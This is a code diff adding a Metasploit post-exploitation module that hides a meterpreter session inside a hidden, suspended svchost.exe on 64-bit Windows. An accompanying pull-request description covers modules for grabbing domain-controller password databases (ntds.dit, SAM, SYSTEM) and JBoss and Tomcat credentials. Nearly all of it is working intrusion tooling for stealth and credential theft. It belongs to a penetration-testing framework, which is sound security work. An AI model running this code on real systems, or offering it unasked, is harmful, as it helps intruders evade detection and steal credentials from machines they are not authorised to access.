+  include Msf::Post::Windows::Registry
+  include Msf::Post::File
+  include Msf::Post::Common
+
+    def initialize(info={})
+        super(update_info(info,
+          'Name'          => 'Architicture Migrate',
+          'Description'   => %q{This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a new process with the correct architecture and migrates into that process.},
+          'License'       => MSF_LICENSE,
+          'Author'        => ['Koen Riepe (koen.riepe@fox-it.com)'],
+          'References'    => [''],
+          'Platform'      => [ 'win' ],
+          'Arch'          => [ 'x86', 'x64' ],
+          'SessionTypes'  => [ 'meterpreter' ]
+        ))
+    end
+
+    def Is32BitOn64Bits()
+        apicall = session.railgun.kernel32.IsWow64Process(-1,4)["Wow64Process"]
+        if apicall == "\x00\x00\x00\x00"
+            migrate = false
+        else
+            migrate = true
+        end
+        return migrate
+    end
+
+    def GetWindowsLoc()
+        apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir",255,255)["lpBuffer"]
+        windir = apicall.split(":")[0]
+        return windir
+    end
+
+    def run
+        if Is32BitOn64Bits()
+            print_error("The meterpreter is not the same architecture as the OS! Upgrading!")
+            windir = GetWindowsLoc()
+            newproc = windir + ':\windows\sysnative\svchost.exe'
+            if exist?(newproc)
+                print_status("Starting new x64 process #{newproc}")
+                pid = session.sys.process.execute(newproc,nil,{'Hidden' => true,'Suspended' => true}).pid
+                print_good("Got pid #{pid}")
+                print_status("Migrating..")
+                session.core.migrate(pid)
+                if pid == session.sys.process.getpid
+                    print_good("Success!")
+                else
+                    print_error("Migration failed!")
+                end
+            end
+        else 
+            print_good("The meterpreter is the same architecture as the OS!")
+        end
+    end
+end


### PR DESCRIPTION
The added modules are NTDSgrab,jboss_gather,tomcat_gather and archmigrate.

NTDSgrab is used to grab the ntds.dit, SAM and SYSTEM files from a domain controller that has powershell installed and automatically puts the files in a cabinet file to compress them. Once the cabinet file is created it is downloaded based on flags.

jboss_gather is used to extract credentials from jboss installations on windows and linux system. The module figures out on which system it is run.

tomcat_gather is used to extract credentials from tomcat installations on windows and linux systems. The modules figures out on which system it is run.

archmigrate is a modules that check if the meterpreter architecture matches that of the system which it is run on and if that is not the case it spawns a new process to migrate into. 

